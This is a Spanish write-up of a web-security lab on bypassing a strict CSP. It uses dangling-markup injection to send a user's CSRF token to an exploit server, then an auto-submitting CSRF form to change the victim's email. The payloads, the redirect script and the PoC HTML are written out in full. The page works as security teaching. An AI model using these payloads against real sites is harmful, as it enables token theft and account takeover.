> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/xss/reflected-xss-protected-by-strict-csp-with-dangling-markup.md).

# XSS reflejado protegido por una CSP muy estricta mediante marcado colgante

### XSS reflejado protegido por una CSP muy estricta, con ataque de marcado colgante

#### Objetivo del laboratorio

* Realiza un ataque XSS que eluda la CSP y exfiltre el token CSRF de un usuario simulado (a través de Burp Collaborator).
* Luego usa este token para cambiar la dirección de correo electrónico de la víctima a `hacker@evil-user.net`.
* El vector visible para la víctima debe contener la palabra **Haga clic** (por ejemplo, `Haz clic en mí`) para animarlo a hacer clic.
* Cuenta de prueba: `wiener:peter`.

#### Observaciones iniciales

* En el formulario de actualización de correo electrónico, al añadir `?email=` a la URL se controla el valor (`valor`) de `correo electrónico` entrada.

<figure><img src="/files/1204149af84e7bbaf18ab8969c37d645d8e89902" alt=""><figcaption></figcaption></figure>

El campo es vulnerable a una inyección de etiquetas HTML (ejemplos de prueba):

* `test"><h1>test</h1>` → `<h1>` se inyecta y se devuelve.

```html
test"><h1>test</h1>
```

<figure><img src="/files/2d26bf56698299860528c2ac4b84ae00920298f2" alt="" width="422"><figcaption></figcaption></figure>

* `test"><script>alert(0)</script>` → `<script>` aparece en el formulario pero \*\*no se ejecuta\*\*.

```javascript
test"><script>alert(0)</script>
```

<figure><img src="/files/99791af0fa8d1ff9af0c911c9a362292496b24ad" alt="" width="429"><figcaption></figcaption></figure>

La consola del navegador indica un bloqueo de la política de seguridad:

{% hint style="danger" %}
Content-Security-Policy: La configuración de la página bloqueó la ejecución de un script en línea (script-src-elem) porque viola la siguiente directiva: “script-src 'self'”
{% endhint %}

<figure><img src="/files/fa23e7414bcfe5f880cfd59063b539073cda3e84" alt=""><figcaption></figcaption></figure>

Encabezado CSP observado:

`content-security-policy`/ `default-src 'self';object-src 'none'; style-src 'self'; script-src 'self'; img-src 'self'; base-uri 'none';`

<figure><img src="/files/503f74c0ad56a0b62b798af240a7b3dfc9be2aee" alt=""><figcaption></figcaption></figure>

#### Estrategia de ataque (marcado colgante)

* En lugar de inyectar un `<script>` (bloqueado por la CSP), el formulario actual se cierra y se crea un nuevo formulario\*\* con el `action` atributo que apunta a nuestro servidor de explotación (servidor de explotación). Este formulario contiene un botón llamado "Click Me" para animar al usuario a hacer clic.

Ejemplo de una inyección que cierra el formulario y crea uno nuevo (formato codificado en URL en la redirección):

{% code overflow="wrap" %}

```javascript
test"></form><form class="login-form" name"change-email-form" action="https://exploit-0a0b002e04ca637f81f4ed8a01da00c2.exploit-server.net/exploit" method="GET"><button class="button" type="submit">Haz clic</button
```

{% endcode %}

<figure><img src="/files/d0bc31eddeabd46f85e22e292a91f741d0af4b96" alt=""><figcaption></figcaption></figure>

* Al abrir este enlace desde la máquina de la víctima (p. ej., mediante redirección), si la víctima hace clic en el botón, el token CSRF se envía en la URL al servidor de explotación y aparece en los registros del servidor contrario.

<figure><img src="/files/0b4f155da3e2b61ccadb22388925f268fe123878" alt=""><figcaption></figcaption></figure>

#### Ejemplo de redirección inyectada (para forzar al usuario a la página vulnerable con la carga útil)

* Script inyectado en el lado atacante para redirigir a la víctima a la página de la carga útil (URL codificada):

```javascript
<script>
location="https://0a4100a704a163818169ee1c00f10037.web-security-academy.net/my-account?email=test%22%3E%3C/form%3E%3Cform%20class=%22login-form%22%20name%22change-email-form%22%20action=%22https://exploit-0a0b002e04ca637f81f4ed8a01da00c2.exploit-server.net/exploit%22%20method=%22GET%22%3E%3Cbutton%20class=%22button%22%20type=%22submit%22%3EClick%20me%3C/button"
</script>
```

* Una vez que la víctima es redirigida y hace clic en el botón, el token CSRF se encuentra en los registros del servidor de explotación.

<figure><img src="/files/846ca9ef5660429f4542a0c27eca01a72ba1992d" alt=""><figcaption></figcaption></figure>

#### Operación posterior a la exfiltración: uso del token CSRF para cambiar el correo electrónico

* Después de obtener el token CSRF (de los registros del servidor de explotación), se construye una página HTML que envía una solicitud POST a `/my-account/change-email` con:
* `email = hacker@evil-user.net`
* `CSRF = <token_obtenido>`

<figure><img src="/files/42c365def6c251e294cab1c56a163873a817b5b2" alt="" width="563"><figcaption></figcaption></figure>

Ejemplo de PoC HTML generado (por Burp o manualmente) para realizar una solicitud POST automatizada

<figure><img src="/files/aca3217dc05d24a3a6a3a3689ec4182928b8364e" alt=""><figcaption></figcaption></figure>

```html
<html>
  <body>
    <form action="https://0a4100a704a163818169ee1c00f10037.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacker@evil-user.net" />
      <input type="hidden" name="csrf" value="L0joiDIMrKKrO7jkqiC6sLYR5MNEbUfu" />
      <input type="submit" value="Enviar solicitud" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/xss/reflected-xss-protected-by-strict-csp-with-dangling-markup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
